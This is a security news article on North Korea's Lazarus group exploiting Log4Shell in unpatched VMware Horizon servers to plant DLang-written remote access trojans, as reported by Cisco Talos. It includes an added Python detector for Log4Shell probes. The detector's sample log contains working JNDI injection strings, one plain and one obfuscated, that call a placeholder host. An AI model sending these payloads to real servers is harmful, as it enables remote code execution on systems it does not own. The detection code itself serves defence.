2023-12-14

Despite receiving a patch two years ago, the Log4Shell vulnerability remains a popular attack vector even for sophisticated threat actors. An example is a recently documented attack campaign against companies from several industries by the North Korean state-run Lazarus APT group. The Lazarus attackers exploited Log4Shell (CVE-2021-44228) in publicly facing and unpatched VMware Horizon servers and used their access to deploy custom remote access trojans (RATs) written in DLang, a programming language that’s not commonly used in malware development.
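For defenders still running exposed Log4j-based services, the practical check is whether the web tier's access logs contain Log4Shell-style JNDI lookup strings. The following is an added detection example (not code from the Talos report or from Cisco); the log lines are constructed, and the `${lower:}`/`${upper:}` unwrapping covers one common obfuscation of the `${jndi:` prefix that a naive substring match would miss.

```python
import re

# Constructed HTTP access-log lines (not taken from the report): one benign
# request, one plain JNDI lookup in the User-Agent, and one obfuscated with
# nested Log4j string lookups.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Dec/2023:10:01:02 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Dec/2023:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.9 - - [14/Dec/2023:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:rmi}://example.invalid/b}"
"""

# Innermost ${lower:x} / ${upper:x} lookups (no further '${' or '}' inside).
_NESTED = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# The resolved lookup prefix Log4j 2 would evaluate on vulnerable versions.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(s: str) -> str:
    """Resolve ${lower:}/${upper:} lookups innermost-first until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = _NESTED.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            s,
        )
    return s


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a (possibly obfuscated) ${jndi: lookup."""
    return bool(_JNDI.search(normalize(line)))


def scan_log(text: str) -> list[tuple[int, str]]:
    """Return (line_number, line) for every line that looks like a Log4Shell probe."""
    return [(n, ln) for n, ln in enumerate(text.splitlines(), 1) if is_log4shell_probe(ln)]


if __name__ == "__main__":
    for n, ln in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ln}")
```

Other lookup forms (for example `${::-j}` default-value tricks) exist, so a hit here is an indicator to triage, and a clean result is not proof the host was never probed.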

The campaign, dubbed Operation Blacksmith by researchers from Cisco Talos, appears to have started in March and continues to date. The attacks are more likely opportunistic than targeted, with recorded victims in the manufacturing, agricultural, and physical security sectors.

Custom remote access trojans built with uncommon technologies

The Lazarus group (APT38) is one of the North Korean government's hacking teams and is usually tasked with cyberespionage and sabotage objectives. The group’s malicious activities span back many years, and it shares some of its toolset and infrastructure with other North Korean APT groups.

In fact, the Talos researchers believe the Lazarus APT today is most likely an umbrella for different sub-groups, each operating its own campaigns and developing bespoke malware for its targets. These sub-groups might have different objectives and don’t always coordinate with each other, despite the occasional overlap.

“During our analysis, Talos found some overlap with the malicious attacks disclosed by Microsoft in October 2023 attributing the activity to Onyx Sleet, also known as PLUTONIUM or Andariel,” the Talos researchers said in their new report on Operation Blacksmith. The Andariel campaign documented by Microsoft exploited CVE-2023-42793, a critical vulnerability in JetBrains TeamCity server, a CI/CD tool used in DevOps. The overlap with Lazarus’ Blacksmith operation was the use of a custom proxy tool dubbed HazyLoad that has only been observed in these two campaigns. However, the other malware implants were different.

In Blacksmith, the attackers deployed three different malware programs written in DLang, a programming language originally released in 2001 that is inspired by C++ but adds many features and paradigms borrowed from other languages. DLang is an unusual choice for malware development, but Lazarus is known for adopting non-traditional technologies, with previous examples including QtFramework and PowerBasic.